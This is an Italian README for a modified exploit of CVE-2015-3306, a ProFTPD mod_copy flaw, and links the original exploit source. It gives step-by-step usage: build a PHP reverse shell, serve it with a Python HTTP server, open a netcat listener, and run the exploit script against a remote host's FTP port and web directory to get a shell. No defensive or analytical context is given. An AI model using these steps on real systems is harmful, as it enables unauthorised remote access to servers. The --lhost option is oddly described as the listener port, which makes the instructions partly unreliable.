Exploit modificato per CVE-2015-3306
Come fare
- Crea una reverse shell PHP
- Avvia un server per ospitare la shell nella stessa directory (python3 -m http.server)
- Avvia un listener netcat sulla porta locale a scelta, esempio: (nc -nlvp [porta a scelta])
- Esegui l'esempio di exploit fornito di seguito (python3 modified_CVE_2015_3306.py --host [host remoto] --port [molto probabilmente porta 21] --path [/var/www o /var/www/html] --shell [nome della shell PHP] --lhost [porta del listener netcat] --server_port [porta del server che ospita la shell]

Codice sorgente dell'exploit originale: https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py